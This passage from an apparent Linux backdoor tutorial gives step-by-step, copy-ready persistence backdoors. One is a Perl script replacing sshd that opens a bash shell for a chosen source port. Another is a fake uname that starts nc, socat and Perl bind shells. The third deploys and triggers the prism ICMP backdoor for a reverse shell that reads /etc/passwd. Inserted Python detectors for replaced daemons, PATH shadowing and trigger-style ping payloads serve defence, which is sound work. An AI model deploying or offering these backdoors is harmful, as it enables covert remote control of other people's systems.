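    return findings
```

Besides /root/.rhosts, check every home directory and /etc/hosts.equiv, which the r-services consult the same way.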
14. CentOS 7 system creates a shell script backdoor posing as the ssh service program
(1) The controlled side creates the fake sshd file
mv /usr/sbin/sshd /usr/bin/ // move the real sshd program away
touch /usr/sbin/sshd // create the fake sshd script file
vi /usr/sbin/sshd // edit the file and add the following
#!/usr/bin/perl
exec "/bin/bash" if (getpeername(STDIN) =~ /^..LF/);
exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV;
Save and exit.
chmod +x /usr/sbin/sshd // give execute permission
systemctl restart sshd // restart the ssh service, which actually runs the code in the malicious script
(2) The attacker connects remotely
socat STDIO TCP4:192.168.242.133:22,sourceport=19526
Note that the source port parameter must be given.
15. CentOS 7 system creates shell scripts that impersonate system commands
(1) The attacker creates a script impersonating the uname program on the controlled server
touch /usr/local/bin/uname // create the backdoor script file
vi /usr/local/bin/uname // edit the file and add the following
#!/bin/bash
nc -l -v -p 4444 -e /bin/bash 2>/dev/null &
socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &
socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &
perl -MIO -e '$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &
/bin/uname $@
Save and exit. Of the four listening commands above, you can choose to run just one.
(2) The administrator runs the impersonated command
uname -r
As you can see, execution is normal, but the port is also secretly listening:
(3) The attacker connects to the controlled side remotely.
nc 192.168.242.133 4444
All four ports can be connected to.
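Sections 14 and 15 replace a program rather than add a new service: a perl script sits where the sshd binary was, and a script in /usr/local/bin wins the PATH lookup over /usr/bin/uname. As an added example (not from the original article), the Python below checks that daemon paths are still ELF executables and lists names that resolve in an earlier PATH directory while a different file of the same name exists later; its demo() builds a constructed layout in a temp dir. Paths and contents in demo() are assumptions for the demo.

```python
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"


def classify(path):
    """'elf', 'script' or 'other' from the first bytes of a file."""
    with open(path, "rb") as f:
        head = f.read(4)
    if head == ELF_MAGIC:
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"


def find_replaced_daemons(paths):
    """Daemon paths that exist but are no longer ELF executables (e.g. sshd swapped for a wrapper)."""
    return [p for p in paths if os.path.isfile(p) and classify(p) != "elf"]


def find_path_shadows(path_dirs):
    """{name: [winning path, shadowed path, ...]} for executables present in more than one PATH
    directory that are not the same file (so a /bin -> /usr/bin merge is not reported)."""
    first, shadows = {}, {}
    for d in path_dirs:
        try:
            names = sorted(os.listdir(d))
        except OSError:
            continue
        for name in names:
            path = os.path.join(d, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & 0o111:
                continue
            if name in first and os.path.realpath(first[name]) != os.path.realpath(path):
                shadows.setdefault(name, [first[name]]).append(path)
            elif name not in first:
                first[name] = path
    return shadows


def demo():
    """Constructed layout: /usr/local/bin/uname shadows /usr/bin/uname and /usr/sbin/sshd is a script."""
    base = tempfile.mkdtemp(prefix="path-audit-")
    dirs = {d: os.path.join(base, d) for d in ("usr/local/bin", "usr/bin", "usr/sbin")}
    for d in dirs.values():
        os.makedirs(d)

    def put(d, name, data):
        p = os.path.join(dirs[d], name)
        with open(p, "wb") as f:
            f.write(data)
        os.chmod(p, 0o755)
        return p

    put("usr/bin", "uname", ELF_MAGIC + b"\x02\x01\x01")
    put("usr/bin", "ls", ELF_MAGIC + b"\x02\x01\x01")
    put("usr/local/bin", "uname", b"#!/bin/bash\n/bin/uname \"$@\"\n")   # the impersonator
    sshd = put("usr/sbin", "sshd", b"#!/usr/bin/perl\n")                   # script where an ELF belongs
    shadows = {n: [os.path.relpath(p, base) for p in ps]
               for n, ps in find_path_shadows([dirs["usr/local/bin"], dirs["usr/bin"]]).items()}
    replaced = [os.path.relpath(p, base)
                for p in find_replaced_daemons([sshd, os.path.join(dirs["usr/bin"], "ls")])]
    return shadows, replaced
```

On a real host, `rpm -Vf /usr/sbin/sshd` (or `dpkg -V openssh-server`) gives the same answer for packaged files; the PATH-shadow check catches files no package owns.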
16. CentOS 6.5 system uses the icmp backdoor prism
(1) Download the prism package
https://github.com/andreafabrizi/prism/
(2) The attacker operates locally
1. Unpack and compile prism.c, but do not execute it
gcc -DDETACH -m32 -Wall -s -o prism prism.c
The compilation succeeded and the executable file was generated.
2. Transfer the prism executable to the controlled side
scp prism user1@192.168.242.132:/home/user1/
3. The attacker listens on a local port
nc -l -p 6666
(3) Operation on the controlled side
1. For prism to run normally, the following package needs to be installed:
yum install glibc.i686
2. Run prism
./prism // run as root
There is no prompt after running.
(4) The attacker operates locally: run sendPacket.py and specify the IP address of the controlled side, the connection password, and the attacker's IP address and listening port.
python2 sendPacket.py 192.168.242.132 p4ssw0rd 192.168.242.1 6666
The connection password defaults to p4ssw0rd.
2. The listener receives the reverse connection
(5) Check the traffic
sendPacket.py sent out an icmp packet. Capture the traffic to confirm:
The first packet is an ICMP echo request; the bounce address and the connection password can be seen in the packet contents.
The following packets are all TCP packets.
The control side issues the cat /etc/passwd command. In the packets sent back to the control side, the source and destination IP addresses and ports can be seen, as well as the data, which is the output of cat /etc/passwd.
So prism only triggers the connection through icmp; the subsequent commands are carried over TCP. The software suits situations where an attacker cannot actively connect to the server's TCP/UDP ports but can ping the server. prism listens for icmp requests on the server and verifies the connection password; after verification the server actively connects to the attacker's VPS and the attacker gets a reverse shell. This shows that prism is an icmp backdoor.
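The capture above makes the detection point: the trigger is an ICMP echo request whose payload carries an address and a password in the clear, which no ordinary ping produces. As an added example (not from the original article), the Python below parses raw IPv4/ICMP bytes and reports echo requests whose payload contains a dotted-quad address. The capture is constructed with a small builder; the trigger payload layout is invented for the demo and is not prism's real wire format.

```python
import re
import struct

IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_icmp_echo(packet):
    """(src, dst, payload) if packet is an IPv4 ICMP echo request, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8:   # protocol 1 = ICMP, 8-byte ICMP header
        return None
    if packet[ihl] != 8:                            # ICMP type 8 = echo request
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    return src, dst, packet[ihl + 8:]


def audit_echo_payloads(packets):
    """(src, dst, address) for echo requests whose payload carries a dotted-quad address.

    iputils ping fills its payload with a timestamp and a counting byte pattern, and
    Windows ping with the alphabet; neither contains an IP literal, so one stands out.
    """
    hits = []
    for pkt in packets:
        parsed = parse_icmp_echo(pkt)
        if parsed is None:
            continue
        src, dst, payload = parsed
        m = IPV4_RE.search(payload.decode("ascii", errors="ignore"))
        if m:
            hits.append((src, dst, m.group(0)))
    return hits


def build_echo(src, dst, payload, proto=1):
    """Constructed IPv4 + ICMP echo request for testing; checksums are left at zero."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, proto, 0,
                     bytes(int(x) for x in src.split(".")), bytes(int(x) for x in dst.split(".")))
    return ip + struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload


# Constructed capture: a normal ping payload, a trigger-style echo naming a host and port to
# call back to (invented layout, not prism's format), and a non-ICMP packet that must be ignored.
CAPTURE = [
    build_echo("192.168.242.1", "192.168.242.132", bytes(range(0x10, 0x10 + 48))),
    build_echo("192.168.242.1", "192.168.242.132", b"192.168.242.1:6666 p4ssw0rd"),
    build_echo("192.168.242.1", "192.168.242.132", b"192.168.242.1:6666", proto=6),
]

if __name__ == "__main__":
    for src, dst, addr in audit_echo_payloads(CAPTURE):
        print(f"echo request {src} -> {dst} carries address {addr}")
```

The same heuristic extends to payload length and entropy; on the wire it is the follow-on outbound TCP connection from the server to the pinging host that confirms the trigger fired.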
This concludes the study of "how to understand backdoors on Linux systems". I hope it resolves your doubts. Combining theory with practice helps you learn better, so go and try it! If you want to keep learning, please continue to follow the website; the editor will keep working to bring you more practical articles.